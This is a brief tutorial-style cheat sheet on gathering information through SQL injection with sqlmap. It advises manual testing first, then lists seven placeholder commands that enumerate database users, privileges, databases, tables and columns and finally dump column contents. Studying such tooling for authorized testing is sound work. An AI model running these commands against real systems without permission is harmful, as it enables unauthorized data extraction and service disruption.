Information Gathering with sqlmap

Step 0: Test injection by hand first.

This is good practice to horn someone own skill.

Plus, sqlmap is just a tool and could use a very inefficient exploitation strategy if going fully automatic without prior manual testing. In addition, sqlmap is a dangerous tool that could crash the remote service if not used correctly.

Step 1: Extract the database banner

sqlmap -u <target> --banner <other_options>

Step 2: List users of the database

sqlmap -u <target> --users <other_options>

Step 3: Check if database user is administrator

sqlmap -u <target> --is-dba <other_options>

Step 4: List available databases

sqlmap -u <target> --dbs <other_options>

Step 5: List tables of selected database

sqlmap -u <target> -D <database> --tables <other_options>

Step 6: List columns of one or more tables

sqlmap -u <target> -D <database> -T <table,table> --columns <other_options>

Step 7: Dump columns

sqlmap -u <target> -D <database> -T <table> -C <column,column> --dump <other_options>